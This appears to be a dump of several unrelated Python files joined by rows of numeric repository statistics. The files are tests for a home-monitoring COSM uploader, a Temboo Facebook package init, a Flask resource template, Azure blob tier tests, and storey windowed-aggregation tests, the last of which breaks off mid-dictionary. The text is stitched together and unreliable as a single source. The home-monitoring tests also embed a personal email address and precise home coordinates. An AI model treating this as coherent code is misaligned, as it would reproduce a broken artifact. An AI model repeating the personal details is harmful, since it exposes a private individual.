Constants.Cosm.location.created: 'created',
Constants.Cosm.location.disposition: "fixed",
Constants.Cosm.location.domain: 'domain',
Constants.Cosm.location.exposure: 'exposure',
Constants.Cosm.location.latitude: 30.3351807498968,
Constants.Cosm.location.longitude: 97.7104604244232 * -1.0, # Eclipse save causes error
Constants.Cosm.location.private: 'private',
Constants.Cosm.apikey: 'apikey',
Constants.Cosm.auto_feed_url: "https://api.cosm.com/v2/feeds/64451.json",
Constants.Cosm.creator: "https://cosm.com/users/gary_pickens",
Constants.Cosm.created: 'created',
Constants.Cosm.email: "gary_pickens@yahoo.com",
Constants.Cosm.feed: "https://api.cosm.com/v2/feeds/64451.json",
Constants.Cosm.id: 64451,
Constants.Cosm.private: "false",
Constants.Cosm.status: "frozen",
Constants.Cosm.tags: ["Door", "Temperature"],
Constants.Cosm.title: "Garage",
Constants.Cosm.updated: 'updated',
Constants.Cosm.url: 'url',
Constants.Cosm.version: "1.0.0",
Constants.Cosm.location_str: 'location',
Constants.Cosm.datastreams: 'datastreams',
}
}
}
cs.report_data( json, data, http )
@patch( 'housemonitor.outputs.cosm.send.CosmConfiguration.configure' )
def test_report_data_with_HttpLib2Error( self, config ):
device = 'device'
port = 'port'
options = MagicMock( in_test_mode=False )
response = Mock( status=200 )
attr = {'request.side_effect': HttpLib2Error}
http = Mock( **attr )
data = {Constants.DataPacket.device: device,
Constants.DataPacket.port: port,
Constants.DataPacket.arrival_time: datetime.datetime( 2012, 1, 2, 3, 4, 5 ),
Constants.DataPacket.current_value: 10}
cs = COSMSend( options )
cs.config = config_data = \
{'device': \
{'port': \
{
Constants.Cosm.datastream.tags: 'tag',
Constants.Cosm.datastream.cosm_channel: '1',
Constants.Cosm.datastream.max_value: 100,
Constants.Cosm.datastream.min_value: 0,
Constants.Cosm.location.created: 'created',
Constants.Cosm.location.disposition: "fixed",
Constants.Cosm.location.domain: 'domain',
Constants.Cosm.location.exposure: 'exposure',
Constants.Cosm.location.latitude: 30.3351807498968,
Constants.Cosm.location.longitude: 97.7104604244232 * -1.0, # Eclipse save causes error
Constants.Cosm.location.private: 'private',
Constants.Cosm.apikey: 'apikey',
Constants.Cosm.auto_feed_url: "https://api.cosm.com/v2/feeds/64451.json",
Constants.Cosm.creator: "https://cosm.com/users/gary_pickens",
Constants.Cosm.created: 'created',
Constants.Cosm.email: "gary_pickens@yahoo.com",
Constants.Cosm.feed: "https://api.cosm.com/v2/feeds/64451.json",
Constants.Cosm.id: 64451,
Constants.Cosm.private: "false",
Constants.Cosm.status: "frozen",
Constants.Cosm.tags: ["Door", "Temperature"],
Constants.Cosm.title: "Garage",
Constants.Cosm.updated: 'updated',
Constants.Cosm.url: 'url',
Constants.Cosm.version: "1.0.0",
Constants.Cosm.location_str: 'location',
Constants.Cosm.datastreams: 'datastreams',
}
}
}
json = 'test'
cs.report_data( json, data, http )
print http.request.call_args
http.request.assert_called_once_with( 'url', body='test', headers={'Content-Type': 'application/x-www-form-urlencoded', 'X-PachubeApiKey': 'apikey'}, method='PUT' )
@patch( 'housemonitor.outputs.cosm.send.CosmConfiguration.configure' )
def test_report_data_with_AttribueError( self, config ):
device = 'device'
port = 'port'
options = MagicMock( in_test_mode=False )
response = Mock( status=200 )
attr = {'request.side_effect': AttributeError}
http = Mock( **attr )
data = {Constants.DataPacket.device: device,
Constants.DataPacket.port: port,
Constants.DataPacket.arrival_time: datetime.datetime( 2012, 1, 2, 3, 4, 5 ),
Constants.DataPacket.current_value: 10}
cs = COSMSend( options )
cs.config = config_data = \
{'device': \
{'port': \
{
Constants.Cosm.datastream.tags: 'tag',
Constants.Cosm.datastream.cosm_channel: '1',
Constants.Cosm.datastream.max_value: 100,
Constants.Cosm.datastream.min_value: 0,
Constants.Cosm.location.created: 'created',
Constants.Cosm.location.disposition: "fixed",
Constants.Cosm.location.domain: 'domain',
Constants.Cosm.location.exposure: 'exposure',
Constants.Cosm.location.latitude: 30.3351807498968,
Constants.Cosm.location.longitude: 97.7104604244232 * -1.0, # Eclipse save causes error
Constants.Cosm.location.private: 'private',
Constants.Cosm.apikey: 'apikey',
Constants.Cosm.auto_feed_url: "https://api.cosm.com/v2/feeds/64451.json",
Constants.Cosm.creator: "https://cosm.com/users/gary_pickens",
Constants.Cosm.created: 'created',
Constants.Cosm.email: "gary_pickens@yahoo.com",
Constants.Cosm.feed: "https://api.cosm.com/v2/feeds/64451.json",
Constants.Cosm.id: 64451,
Constants.Cosm.private: "false",
Constants.Cosm.status: "frozen",
Constants.Cosm.tags: ["Door", "Temperature"],
Constants.Cosm.title: "Garage",
Constants.Cosm.updated: 'updated',
Constants.Cosm.url: 'url',
Constants.Cosm.version: "1.0.0",
Constants.Cosm.location_str: 'location',
Constants.Cosm.datastreams: 'datastreams',
}
}
}
json = 'test'
cs.report_data( json, data, http )
print http.request.call_args
http.request.assert_called_once_with( 'url', body='test', headers={'Content-Type': 'application/x-www-form-urlencoded', 'X-PachubeApiKey': 'apikey'}, method='PUT' )
@patch( 'housemonitor.outputs.cosm.send.CosmConfiguration.configure' )
def test_config_topic_name( self, c ):
options = MagicMock( in_test_mode=False )
cs = COSMSend( options )
self.assertEqual( cs.config_topic_name, 'housemonitor.outputs.cosm.send' )
@patch( 'housemonitor.outputs.cosm.send.CosmConfiguration.configure' )
def test_config_file_name( self, c ):
options = MagicMock( in_test_mode=False )
cs = COSMSend( options )
self.assertEqual( cs.configuration_file_name, 'housemonitor.outputs.cosm.send' )
@patch( 'housemonitor.outputs.cosm.send.CosmConfiguration.configure' )
def test_output( self, c ):
options = MagicMock( in_test_mode=False )
device = 'device'
port = 'port'
data = {Constants.DataPacket.device: device,
Constants.DataPacket.port: port}
cs = COSMSend( options )
cs.createDataStream = Mock()
cs.createJSONReport = Mock()
cs.report_data = Mock()
cs.output( data )
cs.createDataStream.called_once_with( device, port, data )
cs.createJSONReport.called_once_with( device, port, data )
cs.report_data.called_once_with( device, port, data )
@patch( 'housemonitor.outputs.cosm.send.CosmConfiguration.configure' )
def test_output_with_exception( self, c ):
options = MagicMock( in_test_mode=False )
device = 'device'
port = 'port'
data = {Constants.DataPacket.device: device,
Constants.DataPacket.port: port}
cs = COSMSend( options )
cs.createDataStream = Mock()
cs.createJSONReport = Mock()
cs.report_data = Mock( side_effect=Exception( 'Test' ) )
cs.output( data )
cs.createDataStream.called_once_with( device, port, data )
cs.createJSONReport.called_once_with( device, port, data )
cs.report_data.called_once_with( device, port, data )
if __name__ == "__main__":
# import sys;sys.argv = ['', 'Test.testName']
unittest.main() # pragma: no cover
| 53.033654 | 172 | 0.525156 | 3,956 | 44,124 | 5.758847 | 0.05182 | 0.180888 | 0.084804 | 0.034369 | 0.91704 | 0.91208 | 0.87951 | 0.870073 | 0.836406 | 0.821965 | 0 | 0.028239 | 0.362773 | 44,124 | 831 | 173 | 53.097473 | 0.782018 | 0.030482 | 0 | 0.790387 | 0 | 0 | 0.12461 | 0.044775 | 0 | 0 | 0 | 0 | 0.069426 | 0 | null | null | 0.00267 | 0.022697 | null | null | 0.013351 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 8 |
d4008354ef8fe25d8d0713269bb3307bb8938ee2 | 623 | py | Python | temboo/core/Library/Facebook/Actions/Custom/__init__.py | jordanemedlock/psychtruths | 52e09033ade9608bd5143129f8a1bfac22d634dd | [
"Apache-2.0"
] | 7 | 2016-03-07T02:07:21.000Z | 2022-01-21T02:22:41.000Z | temboo/core/Library/Facebook/Actions/Custom/__init__.py | jordanemedlock/psychtruths | 52e09033ade9608bd5143129f8a1bfac22d634dd | [
"Apache-2.0"
] | null | null | null | temboo/core/Library/Facebook/Actions/Custom/__init__.py | jordanemedlock/psychtruths | 52e09033ade9608bd5143129f8a1bfac22d634dd | [
"Apache-2.0"
] | 8 | 2016-06-14T06:01:11.000Z | 2020-04-22T09:21:44.000Z | from temboo.Library.Facebook.Actions.Custom.CreateAction import CreateAction, CreateActionInputSet, CreateActionResultSet, CreateActionChoreographyExecution
from temboo.Library.Facebook.Actions.Custom.DeleteAction import DeleteAction, DeleteActionInputSet, DeleteActionResultSet, DeleteActionChoreographyExecution
from temboo.Library.Facebook.Actions.Custom.ReadActions import ReadActions, ReadActionsInputSet, ReadActionsResultSet, ReadActionsChoreographyExecution
from temboo.Library.Facebook.Actions.Custom.UpdateAction import UpdateAction, UpdateActionInputSet, UpdateActionResultSet, UpdateActionChoreographyExecution
| 124.6 | 156 | 0.903692 | 48 | 623 | 11.729167 | 0.479167 | 0.071048 | 0.120782 | 0.17762 | 0.269982 | 0.269982 | 0 | 0 | 0 | 0 | 0 | 0 | 0.044944 | 623 | 4 | 157 | 155.75 | 0.946218 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 0 | 0 | 1 | null | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 7 |
d41f465e5d5d22f552dfd31b3ff134dc8deda10a | 2,040 | py | Python | generator/resource/templates/resource.py | aeksco/codotype-python-falcon-mongodb-generator | 32680519e249bafe678ee1f6d394893a2e36086c | [
"MIT"
] | null | null | null | generator/resource/templates/resource.py | aeksco/codotype-python-falcon-mongodb-generator | 32680519e249bafe678ee1f6d394893a2e36086c | [
"MIT"
] | null | null | null | generator/resource/templates/resource.py | aeksco/codotype-python-falcon-mongodb-generator | 32680519e249bafe678ee1f6d394893a2e36086c | [
"MIT"
] | null | null | null | from flask.views import MethodView
import json
# CRUD Resources
class <%- schema.class_name %>CollectionResource(MethodView):
def get(self):
status = 200
body = json.dumps({ 'message': 'Hi, this is from GET /<%- schema.identifier_plural %>' })
return body, status
def post(self):
status = 200
body = json.dumps({ 'message': 'Hi, this is from POST /<%- schema.identifier_plural %>' })
class <%- schema.class_name %>ModelResource(MethodView):
def get(self, <%- schema.identifier %>_id):
status = 200
body = json.dumps({ 'message': 'Hi, this is from GET /<%- schema.identifier_plural %>/<%- schema.identifier %>_id' })
return body, status
def put(self, <%- schema.identifier %>_id):
status = 200
body = json.dumps({ 'message': 'Hi, this is from PUT /<%- schema.identifier_plural %>/<%- schema.identifier %>_id' })
return body, status
def delete(self, <%- schema.identifier %>_id):
status = 200
body = json.dumps({ 'message': 'Hi, this is from DELETE /<%- schema.identifier_plural %>/<%- schema.identifier %>_id' })
return body, status
<%_ schema.relations.forEach((rel) => { _%>
<% if (rel.type === 'BELONGS_TO') { -%>
class <%- schema.class_name %>Related<%- rel.schema.class_name %>Resource(MethodView):
def get(self, <%- schema.identifier %>_id):
status = 200
body = json.dumps({ 'message': 'Hi, this is from GET /<%- schema.identifier_plural %>/<%- schema.identifier %>_id/<%- rel.schema.identifier %>' })
return body, status
<% } else if (rel.type === 'HAS_MANY' || rel.type === 'OWNS_MANY') { -%>
class <%- schema.class_name %>Related<%- rel.schema.class_name_plural %>Resource(MethodView):
def get(self, <%- schema.identifier %>_id):
status = 200
body = json.dumps({ 'message': 'Hi, this is from GET /<%- schema.identifier_plural %>/<%- schema.identifier %>_id/<%- rel.schema.identifier_plural %>' })
return body, status
<% } -%>
<% }) -%>
| 42.5 | 161 | 0.609804 | 237 | 2,040 | 5.122363 | 0.185654 | 0.250412 | 0.14827 | 0.098023 | 0.760297 | 0.760297 | 0.728995 | 0.728995 | 0.728995 | 0.608731 | 0 | 0.013035 | 0.210294 | 2,040 | 47 | 162 | 43.404255 | 0.740534 | 0.006863 | 0 | 0.421053 | 0 | 0.052632 | 0.324111 | 0.107213 | 0 | 0 | 0 | 0 | 0 | 0 | null | null | 0 | 0.052632 | null | null | 0 | 0 | 0 | 0 | null | 1 | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
d423efd60be2e94a137d4da9627c143009e85f12 | 13,905 | py | Python | tests/test_azure_5_tier.py | OLC-LOC-Bioinformatics/AzureStorage | ac4dbd83e307a5b8d3fd3b77103ec837b821c564 | [
"MIT"
] | null | null | null | tests/test_azure_5_tier.py | OLC-LOC-Bioinformatics/AzureStorage | ac4dbd83e307a5b8d3fd3b77103ec837b821c564 | [
"MIT"
] | null | null | null | tests/test_azure_5_tier.py | OLC-LOC-Bioinformatics/AzureStorage | ac4dbd83e307a5b8d3fd3b77103ec837b821c564 | [
"MIT"
] | null | null | null | from azure_storage.methods import client_prep, extract_account_name
from azure_storage.azure_tier import AzureContainerTier, AzureTier, cli, container_tier, file_tier, folder_tier
from unittest.mock import patch
import argparse
import pytest
import azure
import os
@pytest.fixture(name='variables', scope='module')
def setup():
class Variables:
def __init__(self):
self.passphrase = 'AzureStorage'
self.account_name = extract_account_name(passphrase=self.passphrase)
self.container_name = '000000container'
self.storage_tier = 'Cool'
return Variables()
def test_tier_client_prep(variables):
variables.container_name, variables.connect_str, variables.blob_service_client, variables.container_client = \
client_prep(container_name=variables.container_name,
passphrase=variables.passphrase,
account_name=variables.account_name)
assert type(variables.blob_service_client) == azure.storage.blob._blob_service_client.BlobServiceClient
@pytest.mark.parametrize('file_name',
['file_1.txt',
'file_1.txt',
'container_integration/file_2.txt',
'nested_container/nested_folder/nested_folder_2/nested_folder_test_1.txt',
'ABC/123/nested_folder_test_1.txt'])
def test_file_tier_cool(variables, file_name):
AzureTier.file_tier(container_client=variables.container_client,
object_name=file_name,
blob_service_client=variables.blob_service_client,
container_name=variables.container_name,
storage_tier=variables.storage_tier)
blobs = variables.container_client.list_blobs()
for blob in blobs:
if blob.name == file_name:
assert blob.blob_tier == variables.storage_tier
@pytest.mark.parametrize('file_name',
['file_1.txt',
'file_1.txt',
'container_integration/file_2.txt',
'nested_container/nested_folder/nested_folder_2/nested_folder_test_1.txt',
'ABC/123/nested_folder_test_1.txt'])
def test_file_tier_hot(variables, file_name):
storage_tier = 'Hot'
AzureTier.file_tier(container_client=variables.container_client,
object_name=file_name,
blob_service_client=variables.blob_service_client,
container_name=variables.container_name,
storage_tier=storage_tier)
blobs = variables.container_client.list_blobs()
for blob in blobs:
if blob.name == file_name:
assert blob.blob_tier == storage_tier
@pytest.mark.parametrize('file_name',
['file_3.txt',
'container_integration_2/file_2.txt',
'nested_container/nested_folder/nested_folder_2/nested_folder_test_14.txt',
'ABC/321/nested_folder_test_1.txt'])
def test_file_tier_missing(variables, file_name):
with pytest.raises(SystemExit):
AzureTier.file_tier(container_client=variables.container_client,
object_name=file_name,
blob_service_client=variables.blob_service_client,
container_name=variables.container_name,
storage_tier=variables.storage_tier)
def test_file_tier_invalid_category(variables):
with pytest.raises(SystemExit):
file_tier_set = AzureTier(container_name=variables.container_name,
object_name='file_1.txt',
account_name=variables.account_name,
passphrase=variables.passphrase,
storage_tier=variables.storage_tier,
category='container')
file_tier_set.main()
def test_file_tier_invalid_container(variables):
with pytest.raises(SystemExit):
file_tier_set = AzureTier(container_name='000000000container',
object_name='file_1.txt',
account_name=variables.account_name,
passphrase=variables.passphrase,
storage_tier=variables.storage_tier,
category='file')
file_tier_set.main()
@patch('argparse.ArgumentParser.parse_args')
def test_file_tier_integration(mock_args, variables):
file_name = 'container_integration/file_2.txt'
mock_args.return_value = argparse.Namespace(passphrase=variables.passphrase,
account_name=variables.account_name,
container_name=variables.container_name,
verbosity='info',
file=file_name,
storage_tier=variables.storage_tier)
arguments = cli()
file_tier(arguments)
blobs = variables.container_client.list_blobs()
for blob in blobs:
if blob.name == file_name:
assert blob.blob_tier == variables.storage_tier
@pytest.mark.parametrize('folder_name,check_file',
[('container_integration/', 'nested_folder_test_1.txt'),
('container_integration/', 'nested_folder_test_1.txt'),
('nested_container/nested_folder', 'nested_file_2.txt'),
('ABC/', 'nested_folder_test_1.txt')])
def test_folder_tier_cool(variables, folder_name, check_file):
AzureTier.folder_tier(container_client=variables.container_client,
object_name=folder_name,
blob_service_client=variables.blob_service_client,
container_name=variables.container_name,
storage_tier=variables.storage_tier)
blobs = variables.container_client.list_blobs()
for blob in blobs:
if blob.name == os.path.join(folder_name, check_file):
assert blob.blob_tier == variables.storage_tier
@pytest.mark.parametrize('folder_name,check_file',
[('container_integration/', 'nested_folder_test_1.txt'),
('container_integration/', 'nested_folder_test_1.txt'),
('nested_container/nested_folder/', 'nested_file_2.txt'),
('ABC/', 'nested_folder_test_1.txt')])
def test_folder_tier_hot(variables, folder_name, check_file):
storage_tier = 'Hot'
AzureTier.folder_tier(container_client=variables.container_client,
object_name=folder_name,
blob_service_client=variables.blob_service_client,
container_name=variables.container_name,
storage_tier=storage_tier)
blobs = variables.container_client.list_blobs()
for blob in blobs:
if blob.name == os.path.join(folder_name, check_file):
assert blob.blob_tier == storage_tier
@pytest.mark.parametrize('folder_name',
['container_integration_4/',
'nested_container_13/nested_folder/',
'123/ABC/'])
def test_folder_tier_missing(variables, folder_name):
with pytest.raises(SystemExit):
AzureTier.folder_tier(container_client=variables.container_client,
object_name=folder_name,
blob_service_client=variables.blob_service_client,
container_name=variables.container_name,
storage_tier=variables.storage_tier)
def test_folder_tier_invalid_container(variables):
with pytest.raises(SystemExit):
file_tier_set = AzureTier(container_name='000000000container',
object_name='container_integration',
account_name=variables.account_name,
passphrase=variables.passphrase,
storage_tier=variables.storage_tier,
category='folder')
file_tier_set.main()
@patch('argparse.ArgumentParser.parse_args')
def test_folder_tier_integration_cool(mock_args, variables):
folder_name = 'container_integration/'
mock_args.return_value = argparse.Namespace(passphrase=variables.passphrase,
account_name=variables.account_name,
container_name=variables.container_name,
verbosity='info',
folder=folder_name,
storage_tier=variables.storage_tier)
arguments = cli()
folder_tier(arguments)
blobs = variables.container_client.list_blobs()
for blob in blobs:
if blob.name == os.path.join(folder_name, 'nested_folder_test_1.txt'):
assert blob.blob_tier == variables.storage_tier
@patch('argparse.ArgumentParser.parse_args')
def test_folder_tier_integration_hot(mock_args, variables):
folder_name = 'container_integration/'
storage_tier = 'Hot'
mock_args.return_value = argparse.Namespace(passphrase=variables.passphrase,
account_name=variables.account_name,
container_name=variables.container_name,
verbosity='info',
folder=folder_name,
storage_tier=storage_tier)
arguments = cli()
folder_tier(arguments)
blobs = variables.container_client.list_blobs()
for blob in blobs:
if blob.name == os.path.join(folder_name, 'nested_folder_test_1.txt'):
assert blob.blob_tier == storage_tier
def test_container_tier_cool(variables):
AzureContainerTier.container_tier(container_client=variables.container_client,
blob_service_client=variables.blob_service_client,
container_name=variables.container_name,
storage_tier=variables.storage_tier)
blobs = variables.container_client.list_blobs()
for blob in blobs:
if blob.name == 'file_1.txt':
assert blob.blob_tier == variables.storage_tier
def test_container_tier_hot(variables):
storage_tier = 'Hot'
AzureContainerTier.container_tier(container_client=variables.container_client,
blob_service_client=variables.blob_service_client,
container_name=variables.container_name,
storage_tier=storage_tier)
blobs = variables.container_client.list_blobs()
for blob in blobs:
if blob.name == 'file_1.txt':
assert blob.blob_tier == storage_tier
@patch('argparse.ArgumentParser.parse_args')
def test_container_tier_integration_cool(mock_args, variables):
mock_args.return_value = argparse.Namespace(passphrase=variables.passphrase,
account_name=variables.account_name,
container_name=variables.container_name,
verbosity='info',
storage_tier=variables.storage_tier)
arguments = cli()
container_tier(arguments)
blobs = variables.container_client.list_blobs()
for blob in blobs:
if blob.name == os.path.join('container_integration', 'nested_folder_test_1.txt'):
assert blob.blob_tier == variables.storage_tier
@patch('argparse.ArgumentParser.parse_args')
def test_container_tier_integration_hot(mock_args, variables):
storage_tier = 'Hot'
mock_args.return_value = argparse.Namespace(passphrase=variables.passphrase,
account_name=variables.account_name,
container_name=variables.container_name,
verbosity='info',
storage_tier=storage_tier)
arguments = cli()
container_tier(arguments)
blobs = variables.container_client.list_blobs()
for blob in blobs:
if blob.name == os.path.join('container_integration', 'nested_folder_test_1.txt'):
assert blob.blob_tier == storage_tier
@patch('argparse.ArgumentParser.parse_args')
def test_container_tier_integration_missing(mock_args, variables):
with pytest.raises(SystemExit):
mock_args.return_value = argparse.Namespace(passphrase=variables.passphrase,
account_name=variables.account_name,
container_name='00000container',
verbosity='info',
storage_tier=variables.storage_tier)
arguments = cli()
container_tier(arguments)
def test_cli():
os.system('AzureTier -h')
| 49.308511 | 115 | 0.580295 | 1,324 | 13,905 | 5.737915 | 0.067221 | 0.073845 | 0.063183 | 0.056865 | 0.854679 | 0.82809 | 0.808609 | 0.794919 | 0.77807 | 0.762406 | 0 | 0.008795 | 0.345847 | 13,905 | 281 | 116 | 49.483986 | 0.826407 | 0 | 0 | 0.754167 | 0 | 0 | 0.116412 | 0.091163 | 0 | 0 | 0 | 0 | 0.05 | 1 | 0.0875 | false | 0.05 | 0.029167 | 0 | 0.125 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
d44da20a4d7d37cf044e282fd73e2d09f924507f | 74,076 | py | Python | tests/test_aggregate_by_key.py | abrookins/storey | ebcb1daba5d72e1a7f6e5cd7ea760248dd4f72e5 | [
"Apache-2.0"
] | null | null | null | tests/test_aggregate_by_key.py | abrookins/storey | ebcb1daba5d72e1a7f6e5cd7ea760248dd4f72e5 | [
"Apache-2.0"
] | null | null | null | tests/test_aggregate_by_key.py | abrookins/storey | ebcb1daba5d72e1a7f6e5cd7ea760248dd4f72e5 | [
"Apache-2.0"
] | null | null | null | import math
import queue
from datetime import datetime, timedelta
from storey import build_flow, SyncEmitSource, Reduce, Table, AggregateByKey, FieldAggregator, NoopDriver
from storey.dtypes import SlidingWindows, FixedWindows, EmitAfterMaxEvent, EmitEveryEvent
test_base_time = datetime.fromisoformat("2020-07-21T21:40:00+00:00")
def append_return(lst, x):
lst.append(x)
return lst
def test_sliding_window_simple_aggregation_flow():
controller = build_flow([
SyncEmitSource(),
AggregateByKey([FieldAggregator("number_of_stuff", "col1", ["sum", "avg", "min", "max"],
SlidingWindows(['1h', '2h', '24h'], '10m'))],
Table("test", NoopDriver())),
Reduce([], lambda acc, x: append_return(acc, x)),
]).run()
for i in range(10):
data = {'col1': i}
controller.emit(data, 'tal', test_base_time + timedelta(minutes=25 * i))
controller.terminate()
actual = controller.await_termination()
expected_results = [
{'col1': 0, 'number_of_stuff_sum_1h': 0, 'number_of_stuff_sum_2h': 0, 'number_of_stuff_sum_24h': 0, 'number_of_stuff_min_1h': 0,
'number_of_stuff_min_2h': 0, 'number_of_stuff_min_24h': 0, 'number_of_stuff_max_1h': 0, 'number_of_stuff_max_2h': 0,
'number_of_stuff_max_24h': 0, 'number_of_stuff_avg_1h': 0.0, 'number_of_stuff_avg_2h': 0.0, 'number_of_stuff_avg_24h': 0.0},
{'col1': 1, 'number_of_stuff_sum_1h': 1, 'number_of_stuff_sum_2h': 1, 'number_of_stuff_sum_24h': 1, 'number_of_stuff_min_1h': 0,
'number_of_stuff_min_2h': 0, 'number_of_stuff_min_24h': 0, 'number_of_stuff_max_1h': 1, 'number_of_stuff_max_2h': 1,
'number_of_stuff_max_24h': 1, 'number_of_stuff_avg_1h': 0.5, 'number_of_stuff_avg_2h': 0.5, 'number_of_stuff_avg_24h': 0.5},
{'col1': 2, 'number_of_stuff_sum_1h': 3, 'number_of_stuff_sum_2h': 3, 'number_of_stuff_sum_24h': 3, 'number_of_stuff_min_1h': 0,
'number_of_stuff_min_2h': 0, 'number_of_stuff_min_24h': 0, 'number_of_stuff_max_1h': 2, 'number_of_stuff_max_2h': 2,
'number_of_stuff_max_24h': 2, 'number_of_stuff_avg_1h': 1.0, 'number_of_stuff_avg_2h': 1.0, 'number_of_stuff_avg_24h': 1.0},
{'col1': 3, 'number_of_stuff_sum_1h': 6, 'number_of_stuff_sum_2h': 6, 'number_of_stuff_sum_24h': 6, 'number_of_stuff_min_1h': 1,
'number_of_stuff_min_2h': 0, 'number_of_stuff_min_24h': 0, 'number_of_stuff_max_1h': 3, 'number_of_stuff_max_2h': 3,
'number_of_stuff_max_24h': 3, 'number_of_stuff_avg_1h': 2.0, 'number_of_stuff_avg_2h': 1.5, 'number_of_stuff_avg_24h': 1.5},
{'col1': 4, 'number_of_stuff_sum_1h': 9, 'number_of_stuff_sum_2h': 10, 'number_of_stuff_sum_24h': 10, 'number_of_stuff_min_1h': 2,
'number_of_stuff_min_2h': 0, 'number_of_stuff_min_24h': 0, 'number_of_stuff_max_1h': 4, 'number_of_stuff_max_2h': 4,
'number_of_stuff_max_24h': 4, 'number_of_stuff_avg_1h': 3.0, 'number_of_stuff_avg_2h': 2.0, 'number_of_stuff_avg_24h': 2.0},
{'col1': 5, 'number_of_stuff_sum_1h': 12, 'number_of_stuff_sum_2h': 15, 'number_of_stuff_sum_24h': 15, 'number_of_stuff_min_1h': 3,
'number_of_stuff_min_2h': 1, 'number_of_stuff_min_24h': 0, 'number_of_stuff_max_1h': 5, 'number_of_stuff_max_2h': 5,
'number_of_stuff_max_24h': 5, 'number_of_stuff_avg_1h': 4.0, 'number_of_stuff_avg_2h': 3.0, 'number_of_stuff_avg_24h': 2.5},
{'col1': 6, 'number_of_stuff_sum_1h': 15, 'number_of_stuff_sum_2h': 20, 'number_of_stuff_sum_24h': 21, 'number_of_stuff_min_1h': 4,
'number_of_stuff_min_2h': 2, 'number_of_stuff_min_24h': 0, 'number_of_stuff_max_1h': 6, 'number_of_stuff_max_2h': 6,
'number_of_stuff_max_24h': 6, 'number_of_stuff_avg_1h': 5.0, 'number_of_stuff_avg_2h': 4.0, 'number_of_stuff_avg_24h': 3.0},
{'col1': 7, 'number_of_stuff_sum_1h': 18, 'number_of_stuff_sum_2h': 25, 'number_of_stuff_sum_24h': 28, 'number_of_stuff_min_1h': 5,
'number_of_stuff_min_2h': 3, 'number_of_stuff_min_24h': 0, 'number_of_stuff_max_1h': 7, 'number_of_stuff_max_2h': 7,
'number_of_stuff_max_24h': 7, 'number_of_stuff_avg_1h': 6.0, 'number_of_stuff_avg_2h': 5.0, 'number_of_stuff_avg_24h': 3.5},
{'col1': 8, 'number_of_stuff_sum_1h': 21, 'number_of_stuff_sum_2h': 30, 'number_of_stuff_sum_24h': 36, 'number_of_stuff_min_1h': 6,
'number_of_stuff_min_2h': 4, 'number_of_stuff_min_24h': 0, 'number_of_stuff_max_1h': 8, 'number_of_stuff_max_2h': 8,
'number_of_stuff_max_24h': 8, 'number_of_stuff_avg_1h': 7.0, 'number_of_stuff_avg_2h': 6.0, 'number_of_stuff_avg_24h': 4.0},
{'col1': 9, 'number_of_stuff_sum_1h': 24, 'number_of_stuff_sum_2h': 35, 'number_of_stuff_sum_24h': 45, 'number_of_stuff_min_1h': 7,
'number_of_stuff_min_2h': 5, 'number_of_stuff_min_24h': 0, 'number_of_stuff_max_1h': 9, 'number_of_stuff_max_2h': 9,
'number_of_stuff_max_24h': 9, 'number_of_stuff_avg_1h': 8.0, 'number_of_stuff_avg_2h': 7.0, 'number_of_stuff_avg_24h': 4.5}
]
assert actual == expected_results, \
f'actual did not match expected. \n actual: {actual} \n expected: {expected_results}'
def test_sliding_window_sparse_data():
controller = build_flow([
SyncEmitSource(),
AggregateByKey(
[FieldAggregator("number_of_stuff1", "col1", ["sum", "avg", "min", "max"], SlidingWindows(['1h', '2h', '24h'], '10m')),
FieldAggregator("number_of_stuff2", "col2", ["sum", "avg", "min", "max"], SlidingWindows(['1h', '2h', '24h'], '10m'))],
Table("test", NoopDriver())),
Reduce([], lambda acc, x: append_return(acc, x)),
]).run()
for i in range(10):
controller.emit({'col1': i}, 'tal', test_base_time + timedelta(minutes=25 * i))
controller.emit({'col2': i}, 'tal', test_base_time + timedelta(minutes=25 * i))
controller.terminate()
actual = controller.await_termination()
expected_results = [{'col1': 0, 'number_of_stuff1_avg_1h': 0.0, 'number_of_stuff1_avg_24h': 0.0, 'number_of_stuff1_avg_2h': 0.0,
'number_of_stuff1_max_1h': 0, 'number_of_stuff1_max_24h': 0, 'number_of_stuff1_max_2h': 0,
'number_of_stuff1_min_1h': 0, 'number_of_stuff1_min_24h': 0, 'number_of_stuff1_min_2h': 0,
'number_of_stuff1_sum_1h': 0, 'number_of_stuff1_sum_24h': 0, 'number_of_stuff1_sum_2h': 0,
'number_of_stuff2_avg_1h': math.nan, 'number_of_stuff2_avg_24h': math.nan, 'number_of_stuff2_avg_2h': math.nan,
'number_of_stuff2_max_1h': math.nan, 'number_of_stuff2_max_24h': math.nan, 'number_of_stuff2_max_2h': math.nan,
'number_of_stuff2_min_1h': math.nan, 'number_of_stuff2_min_24h': math.nan, 'number_of_stuff2_min_2h': math.nan,
'number_of_stuff2_sum_1h': 0, 'number_of_stuff2_sum_24h': 0, 'number_of_stuff2_sum_2h': 0},
{'col2': 0, 'number_of_stuff1_avg_1h': 0.0, 'number_of_stuff1_avg_24h': 0.0, 'number_of_stuff1_avg_2h': 0.0,
'number_of_stuff1_max_1h': 0, 'number_of_stuff1_max_24h': 0, 'number_of_stuff1_max_2h': 0,
'number_of_stuff1_min_1h': 0, 'number_of_stuff1_min_24h': 0, 'number_of_stuff1_min_2h': 0,
